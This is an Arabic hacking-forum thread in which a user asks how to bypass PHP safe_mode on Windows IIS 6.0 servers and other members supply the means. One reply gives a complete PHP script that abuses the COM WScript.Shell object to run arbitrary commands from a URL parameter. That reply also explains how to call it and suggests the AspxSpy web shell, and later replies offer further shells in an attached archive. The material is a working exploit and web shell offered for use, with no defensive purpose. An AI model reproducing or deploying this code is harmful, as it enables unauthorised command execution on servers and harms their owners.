تخطي السيف مود

[b]السلام عليكم

عندي مشكلة في تخطي

safe mode

شوفو

SAFE_MODE: ON OPEN_BASEDIR: NONE SAFE_MODE_EXEC_DIR: NONE SAFE_MODE_INCLUDE_DIR: NONE
DISABLE_FUNCTION : NONE

مع العلم انها في سيرفرات

Windows NT OSCAR 5.2 build 3790
Microsoft-IIS/6.0

[COLOR=black]و ان شاء الله القى الافادة
[/COLOR][/b]

[b]جرب هذه الثغرة

http://securityreason.com/exploitalert/2071

أرفع هذا الملف

<?php
   //PHP COM extensions (inconsistent Win32) safe_mode bypass
   //by rgod

    $____suntzu = new COM("WScript.Shell");
    $____suntzu->Run('c:windowssystem32cmd.exe /c
'.escapeshellarg($_GET[cmd]).' >
'.dirname($_SERVER[SCRIPT_FILENAME]).'/suntzoi.txt');
    $____suntzoi=file("suntzoi.txt");
    for ($i=0; $i<count($____suntzoi); $i++) {echo
nl2br(htmlentities($____suntzoi[$i]));}

   // *quote* from the php manual:
   // There is no installation needed to use these functions; they are part
of the PHP core.

   // The windows version of PHP has built in support for this extension.
You do not need to load any additional extension in order to use these
functions.

   // You are responsible for installing support for the various COM
objects that you intend to use (such as MS Word);
   // we don't and can't bundle all of those with PHP.
?>

و استعمله هكذا

[/b]

file.php?cmd=[command]


[b]
و اذا لم يتكمن منصب مترجم php إستعمل شيل AspxSpy لم اجده عندي شوف قوقو

و سلام …

[/b]

شكرا قيد التجربة

جرب هذه الشيلات

إذا منفع ارسل الشيل فرسالة خاصة

raym0n.rar (26.8 KB)